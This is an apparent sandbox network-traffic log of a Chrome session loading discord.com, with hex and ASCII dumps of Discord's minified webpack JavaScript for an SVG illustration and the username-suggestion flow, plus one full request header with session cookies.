                                                                          2023-12-10 16:45:23 UTC247INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 38 35 36 30 22 5d 2c 7b 35 32 38 35 30 32 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 6c 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 2e 72 28 6c 29 2c 73 2e 64 28 6c 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 74 3d 73 28 22 33 37 39 38 33 22 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 61 29 7b 72 65 74 75 72 6e 28 30 2c 74 2e 6a 73 78 73 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 61 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["68560"],{528502:function(a,l,s){"use strict";s.r(l),s.d(l,{default:function(){return c}});var t=s("37983");function c(a){return(0,t.jsxs)("svg",{...a,xmlns:"http://www.w3.org/
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 32 30 30 30 2f 73 76 67 22 2c 78 6d 6c 6e 73 58 6c 69 6e 6b 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 31 37 30 30 20 31 32 30 30 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 74 2e 6a 73 78 73 29 28 22 64 65 66 73 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 74 2e 6a 73 78 73 29 28 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 22 2c 7b 69 64 3a 22 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 22 2c 78 31 3a 22 32 36 39 2e 37 31 22 2c 78 32 3a 22 32 36 39 2e 37 31 22 2c 79 31 3a 22 38 30 30 2e 34 22 2c 79 32 3a 22 39 31 33 2e 32 39 22 2c 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3a 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30
                                                                          Data Ascii: 2000/svg",xmlnsXlink:"http://www.w3.org/1999/xlink",viewBox:"0 0 1700 1200",children:[(0,t.jsxs)("defs",{children:[(0,t.jsxs)("linearGradient",{id:"linear-gradient",x1:"269.71",x2:"269.71",y1:"800.4",y2:"913.29",gradientUnits:"userSpaceOnUse",children:[(0
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 31 37 37 2e 38 34 22 2c 79 32 3a 22 31 31 33 39 2e 38 39 22 2c 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3a 22 72 6f 74 61 74 65 28 2d 34 2e 32 20 2d 31 33 31 35 37 2e 30 30 32 20 2d 31 33 34 34 34 2e 32 36 29 22 2c 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3a 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 74 2e 6a 73 78 29 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 22 30 22 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 66 66 63 36 31 39 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 22 31 22 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 66 66 65 37 35 63 22 7d 29 5d 7d 29 5d 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 35 38 36 35 66 32
                                                                          Data Ascii: 177.84",y2:"1139.89",gradientTransform:"rotate(-4.2 -13157.002 -13444.26)",gradientUnits:"userSpaceOnUse",children:[(0,t.jsx)("stop",{offset:"0",stopColor:"#ffc619"}),(0,t.jsx)("stop",{offset:"1",stopColor:"#ffe75c"})]})]}),(0,t.jsx)("path",{fill:"#5865f2
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 31 20 31 30 33 20 31 31 2e 36 20 31 32 2e 35 20 39 2e 37 2d 31 35 2e 35 20 38 2d 37 38 2e 33 20 38 48 36 30 2e 32 61 35 20 35 20 30 20 30 31 2d 35 2d 35 20 34 2e 39 20 34 2e 39 20 30 20 30 31 32 2e 37 2d 34 2e 34 7a 22 2c 22 64 61 74 61 2d 6e 61 6d 65 22 3a 22 4c 61 79 65 72 20 32 34 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 36 38 37 34 66 37 22 2c 64 3a 22 4d 31 35 32 35 2e 38 20 38 32 34 2e 36 61 33 34 2e 37 20 33 34 2e 37 20 30 20 30 30 2d 36 36 2e 39 2d 31 32 2e 31 20 33 33 2e 33 20 33 33 2e 33 20 30 20 30 30 2d 37 2e 38 2d 2e 39 20 33 36 2e 33 20 33 36 2e 33 20 30 20 30 30 2d 32 37 2e 38 20 31 33 68 31 30 32 2e 35 7a 22 2c 22 64 61 74 61 2d 6e 61 6d 65 22 3a 22 4c 61 79 65 72 20 32 33 22 7d 29 2c 28 30 2c
                                                                          Data Ascii: 1 103 11.6 12.5 9.7-15.5 8-78.3 8H60.2a5 5 0 01-5-5 4.9 4.9 0 012.7-4.4z","data-name":"Layer 24"}),(0,t.jsx)("path",{fill:"#6874f7",d:"M1525.8 824.6a34.7 34.7 0 00-66.9-12.1 33.3 33.3 0 00-7.8-.9 36.3 36.3 0 00-27.8 13h102.5z","data-name":"Layer 23"}),(0,
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 6f 6b 65 57 69 64 74 68 3a 22 32 2e 32 30 31 22 2c 64 3a 22 4d 31 39 37 2e 31 20 33 37 35 2e 33 61 35 38 2e 33 20 35 38 2e 33 20 30 20 30 30 33 37 2e 36 2d 37 34 2e 37 63 2d 33 2e 33 2d 39 2e 37 2d 31 31 2d 32 30 2e 35 2d 31 39 2e 32 2d 32 38 2e 34 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 30 63 31 61 61 64 22 2c 64 3a 22 4d 32 31 33 2e 34 20 33 30 35 2e 38 63 35 2e 32 2d 31 31 2e 34 20 37 2e 39 2d 31 30 2e 34 20 31 39 2e 36 2d 39 20 39 2e 33 20 31 2e 31 20 32 31 2e 39 20 31 38 2e 32 20 39 20 32 39 2e 35 73 2d 34 32 2e 32 20 39 2e 37 2d 32 38 2e 36 2d 32 30 2e 35 7a 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 63 69 72 63 6c 65 22 2c 7b 63 78 3a 22 31 37 36 2e 34 22 2c 63 79 3a 22 32 37 37 2e 33 22 2c 72 3a 22
                                                                          Data Ascii: okeWidth:"2.201",d:"M197.1 375.3a58.3 58.3 0 0037.6-74.7c-3.3-9.7-11-20.5-19.2-28.4"}),(0,t.jsx)("path",{fill:"#0c1aad",d:"M213.4 305.8c5.2-11.4 7.9-10.4 19.6-9 9.3 1.1 21.9 18.2 9 29.5s-42.2 9.7-28.6-20.5z"}),(0,t.jsx)("circle",{cx:"176.4",cy:"277.3",r:"
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 66 69 6c 6c 3a 22 23 66 66 63 36 31 39 22 2c 64 3a 22 4d 32 31 30 2e 31 20 33 30 37 2e 33 68 2d 39 2e 35 61 32 2e 33 20 32 2e 33 20 30 20 30 31 2d 32 2e 32 2d 31 2e 34 6c 2d 31 2e 31 2d 32 2e 34 2d 31 2e 32 2d 34 2e 39 2d 33 2e 33 20 31 38 2e 35 68 31 35 2e 36 61 36 2e 35 20 36 2e 35 20 30 20 30 30 36 2e 33 2d 34 2e 39 63 2e 34 2d 32 2e 37 2d 31 2e 36 2d 34 2e 39 2d 34 2e 36 2d 34 2e 39 7a 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 66 66 63 36 31 39 22 2c 64 3a 22 4d 32 30 38 2e 31 20 33 31 37 2e 31 68 2d 31 35 2e 33 6c 31 2e 39 20 39 2e 39 68 31 31 2e 37 63 32 2e 39 20 30 20 35 2e 38 2d 32 2e 32 20 36 2e 32 2d 34 2e 39 73 2d 31 2e 35 2d 35 2d 34 2e 35 2d 35 7a 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61
                                                                          Data Ascii: fill:"#ffc619",d:"M210.1 307.3h-9.5a2.3 2.3 0 01-2.2-1.4l-1.1-2.4-1.2-4.9-3.3 18.5h15.6a6.5 6.5 0 006.3-4.9c.4-2.7-1.6-4.9-4.6-4.9z"}),(0,t.jsx)("path",{fill:"#ffc619",d:"M208.1 317.1h-15.3l1.9 9.9h11.7c2.9 0 5.8-2.2 6.2-4.9s-1.5-5-4.5-5z"}),(0,t.jsx)("pa
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 20 32 36 2e 36 20 31 34 2e 36 20 36 20 31 38 2e 38 20 31 30 20 32 35 2e 34 6c 34 2e 34 20 36 2e 34 63 34 2e 38 20 37 2e 33 20 31 30 2e 31 20 31 37 2e 37 20 33 2e 35 20 33 30 2e 39 61 37 30 2e 38 20 37 30 2e 38 20 30 20 30 30 35 20 31 30 2e 34 7a 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 35 38 2e 31 20 33 36 32 63 2d 31 2e 36 2d 39 2e 37 20 31 2e 35 2d 31 37 2e 31 20 38 2e 31 2d 31 39 2e 32 6c 2d 31 38 2e 35 2d 39 2e 33 2d 31 31 2e 37 20 37 61 39 36 20 39 36 20 30 20 30 30 32 32 2e 31 20 32 31 2e 35 7a 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 36 36 62 63 66 66 22 2c 64 3a 22 4d 32 34 32 2e 38 20 34 31 36 2e 38 56 34 31 35 63 2d 32 2e 35 2d 2e 31 2d 32 2e 39 2d 31 2e 39 2d
                                                                          Data Ascii: 26.6 14.6 6 18.8 10 25.4l4.4 6.4c4.8 7.3 10.1 17.7 3.5 30.9a70.8 70.8 0 005 10.4z"}),(0,t.jsx)("path",{d:"M158.1 362c-1.6-9.7 1.5-17.1 8.1-19.2l-18.5-9.3-11.7 7a96 96 0 0022.1 21.5z"}),(0,t.jsx)("path",{fill:"#66bcff",d:"M242.8 416.8V415c-2.5-.1-2.9-1.9-
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 30 2e 34 20 30 20 32 30 2e 33 2d 38 2e 34 20 32 31 2e 39 2d 31 38 2e 37 76 2d 2e 35 63 31 2e 37 2d 31 30 2e 32 2d 35 2e 36 2d 31 38 2e 37 2d 31 36 2d 31 38 2e 37 48 32 34 33 63 2d 31 30 2e 34 20 30 2d 32 30 2e 33 20 38 2e 35 2d 32 31 2e 39 20 31 38 2e 37 76 2e 35 63 2d 31 2e 37 20 31 30 2e 33 20 35 2e 35 20 31 38 2e 37 20 31 36 20 31 38 2e 37 7a 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 38 63 64 39 66 66 22 2c 64 3a 22 4d 32 34 30 2e 33 20 32 35 31 2e 38 61 39 2e 35 20 39 2e 35 20 30 20 30 30 39 2d 37 2e 37 76 2d 2e 32 61 36 2e 34 20 36 2e 34 20 30 20 30 30 2d 36 2e 36 2d 37 2e 37 20 39 2e 34 20 39 2e 34 20 30 20 30 30 2d 39 20 37 2e 37 76 2e 32 61 36 2e 35 20 36 2e 35 20 30 20 30 30 36 2e 36 20 37 2e 37 7a 22
                                                                          Data Ascii: 0.4 0 20.3-8.4 21.9-18.7v-.5c1.7-10.2-5.6-18.7-16-18.7H243c-10.4 0-20.3 8.5-21.9 18.7v.5c-1.7 10.3 5.5 18.7 16 18.7z"}),(0,t.jsx)("path",{fill:"#8cd9ff",d:"M240.3 251.8a9.5 9.5 0 009-7.7v-.2a6.4 6.4 0 00-6.6-7.7 9.4 9.4 0 00-9 7.7v.2a6.5 6.5 0 006.6 7.7z"
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 2e 33 63 32 2e 37 2d 38 2e 33 20 31 2e 38 2d 31 33 2e 36 2e 36 2d 31 36 2e 35 4d 31 39 34 2e 31 20 32 34 35 2e 32 63 35 2e 35 2d 2e 33 20 38 2e 39 2d 32 2e 31 20 31 31 2e 38 2d 35 2e 32 4d 31 38 34 2e 36 20 32 37 30 2e 37 61 31 33 20 31 33 20 30 20 30 31 30 20 33 2e 31 4d 31 36 39 2e 31 20 32 35 39 2e 37 63 2d 34 2e 37 20 34 2e 34 2d 31 32 2e 35 20 34 2e 39 2d 31 38 2e 31 20 34 4d 31 36 39 2e 37 20 32 34 31 2e 38 63 2d 32 2e 34 2d 33 2e 37 2d 36 2e 35 2d 37 2e 37 2d 31 30 2d 38 2e 39 4d 31 39 35 2e 32 20 32 36 30 2e 36 61 32 39 2e 37 20 32 39 2e 37 20 30 20 30 30 35 2e 39 20 31 2e 33 22 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 23 63 34 30 36 35 35 22 2c 64 3a 22 4d 31 37 38 2e 37 20 32 34 37 2e 38 63 33 2e 35 20 38
                                                                          Data Ascii: .3c2.7-8.3 1.8-13.6.6-16.5M194.1 245.2c5.5-.3 8.9-2.1 11.8-5.2M184.6 270.7a13 13 0 010 3.1M169.1 259.7c-4.7 4.4-12.5 4.9-18.1 4M169.7 241.8c-2.4-3.7-6.5-7.7-10-8.9M195.2 260.6a29.7 29.7 0 005.9 1.3"}),(0,t.jsx)("path",{fill:"#c40655",d:"M178.7 247.8c3.5 8


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          357192.168.2.550093162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC981OUTGET /assets/76546.c03cce63ade2b24646c3.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=7gQkpm8Wrg7CGgLYMJA0VTWrMBLEHt4_9y7yWstYA8M-1702226723349-0-604800000
                                                                          2023-12-10 16:45:24 UTC1120INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 30 36 39 64 62 36 37 63 30 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:23 GMTContent-Type: application/javascriptContent-Length: 12162Connection: closeCF-Ray: 8336f54069db67c0-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:24 UTC249INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 36 35 34 36 22 5d 2c 7b 32 35 35 34 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 37 35 39 38 34 33 22 29 2c 61 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 72 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 73 3d 6e 28 22 34 34 38 39 39 33 22 29 2c 6f 3d 6e 28 22 35 39 39 31 31 30 22 29 2c 75 3d 6e 28 22 38 34 30 37 30 37 22 29
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["76546"],{255403:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return m}});var i=n("759843"),a=n("872717"),r=n("913144"),s=n("448993"),o=n("599110"),u=n("840707")
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 2c 6c 3d 6e 28 22 32 31 30 38 39 38 22 29 2c 64 3d 6e 28 22 38 35 36 33 36 38 22 29 2c 63 3d 6e 28 22 36 39 37 35 34 33 22 29 2c 67 3d 6e 28 22 34 39 31 31 31 22 29 2c 66 3d 6e 28 22 37 38 32 33 34 30 22 29 3b 6e 28 22 32 35 38 31 22 29 3b 76 61 72 20 6d 3d 7b 72 65 73 65 74 53 75 67 67 65 73 74 69 6f 6e 73 3a 28 29 3d 3e 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 50 4f 4d 45 4c 4f 5f 53 55 47 47 45 53 54 49 4f 4e 53 5f 52 45 53 45 54 22 7d 29 2c 61 73 79 6e 63 20 66 65 74 63 68 53 75 67 67 65 73 74 69 6f 6e 73 52 65 67 69 73 74 72 61 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e
                                                                          Data Ascii: ,l=n("210898"),d=n("856368"),c=n("697543"),g=n("49111"),f=n("782340");n("2581");var m={resetSuggestions:()=>r.default.dispatch({type:"POMELO_SUGGESTIONS_RESET"}),async fetchSuggestionsRegistration(e){let t=arguments.length>1&&void 0!==arguments[1]?argumen
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 57 5f 45 52 52 4f 52 5f 44 4f 54 5f 44 4f 54 3a 74 2e 6c 65 6e 67 74 68 3c 32 7c 7c 74 2e 6c 65 6e 67 74 68 3e 33 32 3f 66 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 50 4f 4d 45 4c 4f 5f 45 58 49 53 54 49 4e 47 5f 46 4c 4f 57 5f 45 52 52 4f 52 5f 4c 49 4d 49 54 2e 66 6f 72 6d 61 74 28 7b 6d 61 78 4e 75 6d 3a 33 32 2c 6d 69 6e 4e 75 6d 3a 32 7d 29 3a 76 6f 69 64 20 30 29 3b 69 66 28 6e 75 6c 6c 21 3d 6d 29 72 65 74 75 72 6e 20 6f 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 67 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 50 4f 4d 45 4c 4f 5f 45 52 52 4f 52 53 2c 7b 72 65 61 73 6f 6e 3a 6d 2c 75 73 65 72 6e 61 6d 65 5f 65 72 72 6f 72 3a 21 30 2c 6c 6f 63 61 74 69 6f 6e 3a 61 2c 6f 6e 65 5f 63 6c 69 63 6b 5f 66 6c 6f 77 3a 63 7d 29 2c 72 2e 64
                                                                          Data Ascii: W_ERROR_DOT_DOT:t.length<2||t.length>32?f.default.Messages.POMELO_EXISTING_FLOW_ERROR_LIMIT.format({maxNum:32,minNum:2}):void 0);if(null!=m)return o.default.track(g.AnalyticEvents.POMELO_ERRORS,{reason:m,username_error:!0,location:a,one_click_flow:c}),r.d
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 63 6c 69 63 6b 5f 66 6c 6f 77 3a 74 7d 7d 7d 29 3b 72 65 74 75 72 6e 20 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 55 52 52 45 4e 54 5f 55 53 45 52 5f 55 50 44 41 54 45 22 2c 75 73 65 72 3a 6e 2e 62 6f 64 79 7d 29 2c 6e 2e 62 6f 64 79 7d 7d 7d 2c 32 31 30 38 39 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 67 65 74 50 6f 6d 65 6c 6f 41 74 74 65 6d 70 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 38 36 32 32 30 35 22 29 3b 6c 65 74 20 61 3d 28 30 2c 69 2e 63 72 65 61 74 65 45 78 70 65 72 69 6d 65 6e 74 29 28 7b 6b 69 6e 64 3a 22 75 73 65 72 22 2c 6c 61 62 65 6c 3a 22 50 6f 6d
                                                                          Data Ascii: click_flow:t}}});return r.default.dispatch({type:"CURRENT_USER_UPDATE",user:n.body}),n.body}}},210898:function(e,t,n){"use strict";n.r(t),n.d(t,{getPomeloAttempt:function(){return r}});var i=n("862205");let a=(0,i.createExperiment)({kind:"user",label:"Pom
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 76 6f 69 64 20 30 7d 2c 73 6f 75 72 63 65 3a 76 6f 69 64 20 30 2c 66 65 74 63 68 65 64 3a 21 31 7d 7d 7d 3b 63 6c 61 73 73 20 6c 20 65 78 74 65 6e 64 73 20 72 2e 64 65 66 61 75 6c 74 2e 53 74 6f 72 65 7b 69 73 52 61 74 65 4c 69 6d 69 74 65 64 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 75 2e 72 65 74 72 79 41 66 74 65 72 54 69 6d 65 26 26 44 61 74 65 2e 6e 6f 77 28 29 3c 75 2e 72 65 74 72 79 41 66 74 65 72 54 69 6d 65 7d 76 61 6c 69 64 61 74 65 28 65 29 7b 6c 65 74 20 74 3d 75 2e 76 61 6c 69 64 61 74 69 6f 6e 73 2e 67 65 74 28 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 52 61 74 65 4c 69 6d 69 74 65 64 28 29 26 26 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 2e 72 61 74 65 4c 69 6d 69 74 65 64 29 3f 6f 3a 74 68 69 73 2e 69 73 52 61 74 65 4c 69 6d 69 74 65
                                                                          Data Ascii: void 0},source:void 0,fetched:!1}}};class l extends r.default.Store{isRateLimited(){return null!=u.retryAfterTime&&Date.now()<u.retryAfterTime}validate(e){let t=u.validations.get(e);return this.isRateLimited()&&(null==t||t.rateLimited)?o:this.isRateLimite
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 73 74 69 6f 6e 3a 74 2c 66 65 74 63 68 65 64 3a 21 30 7d 2c 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 69 6e 76 61 6c 69 64 5f 63 75 72 72 65 6e 74 5f 75 73 65 72 6e 61 6d 65 29 3d 3d 3d 21 30 26 26 28 75 2e 63 75 72 72 65 6e 74 55 73 65 72 6e 61 6d 65 49 6e 76 61 6c 69 64 3d 21 30 29 7d 2c 50 4f 4d 45 4c 4f 5f 52 45 47 49 53 54 52 41 54 49 4f 4e 5f 53 55 47 47 45 53 54 49 4f 4e 53 5f 53 55 43 43 45 53 53 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 73 75 67 67 65 73 74 69 6f 6e 3a 74 2c 73 6f 75 72 63 65 3a 6e 7d 3d 65 3b 75 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 3d 7b 73 75 67 67 65 73 74 69 6f 6e 3a 74 2c 73 6f 75 72 63 65 3a 6e 2c 66 65 74 63 68 65 64 3a 21 30 7d 2c 28 6e 75 6c 6c 3d 3d 74 3f 76 6f
                                                                          Data Ascii: stion:t,fetched:!0},(null==t?void 0:t.invalid_current_username)===!0&&(u.currentUsernameInvalid=!0)},POMELO_REGISTRATION_SUGGESTIONS_SUCCESS:function(e){let{suggestion:t,source:n}=e;u.suggestions.registration={suggestion:t,source:n,fetched:!0},(null==t?vo
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 36 34 34 34 31 37 22 29 2c 64 3d 6e 28 22 39 33 35 35 38 33 22 29 2c 63 3d 6e 28 22 37 38 32 33 34 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 6c 65 74 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 2e 64 65 66 61 75 6c 74 2e 67 65 74 55 73 65 72 41 76 61 74 61 72 55 52 4c 28 7b 69 64 3a 65 2e 69 64 2c 61 76 61 74 61 72 3a 65 2e 61 76 61 74 61 72 2c 62 6f 74 3a 65 2e 62 6f 74 2c 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 3a 22 30 30 30 30 22 7d 2c 74 2c 38 30 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 6c 65 74 20 74 3d 28 30 2c 75 2e 73 74 72 69 70 44 69 61 63 72 69 74 69 63 73 29 28
                                                                          Data Ascii: 644417"),d=n("935583"),c=n("782340");function g(e){let t=!(arguments.length>1)||void 0===arguments[1]||arguments[1];return s.default.getUserAvatarURL({id:e.id,avatar:e.avatar,bot:e.bot,discriminator:"0000"},t,80)}function f(e){let t=(0,u.stripDiacritics)(
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 65 56 61 6c 69 64 61 74 69 6f 6e 53 74 61 74 65 2e 45 52 52 4f 52 2c 6d 65 73 73 61 67 65 3a 74 7d 7d 29 2e 77 69 74 68 28 7b 74 61 6b 65 6e 3a 21 31 7d 2c 28 29 3d 3e 28 7b 74 79 70 65 3a 6c 2e 4e 61 6d 65 56 61 6c 69 64 61 74 69 6f 6e 53 74 61 74 65 2e 41 56 41 49 4c 41 42 4c 45 2c 6d 65 73 73 61 67 65 3a 63 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 50 4f 4d 45 4c 4f 5f 45 58 49 53 54 49 4e 47 5f 46 4c 4f 57 5f 41 56 41 49 4c 41 42 4c 45 7d 29 29 2e 77 69 74 68 28 7b 74 61 6b 65 6e 3a 21 30 7d 2c 28 29 3d 3e 28 7b 74 79 70 65 3a 6c 2e 4e 61 6d 65 56 61 6c 69 64 61 74 69 6f 6e 53 74 61 74 65 2e 45 52 52 4f 52 2c 6d 65 73 73 61 67 65 3a 63 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 50 4f 4d 45 4c 4f 5f 45 58 49 53 54 49 4e 47 5f 46
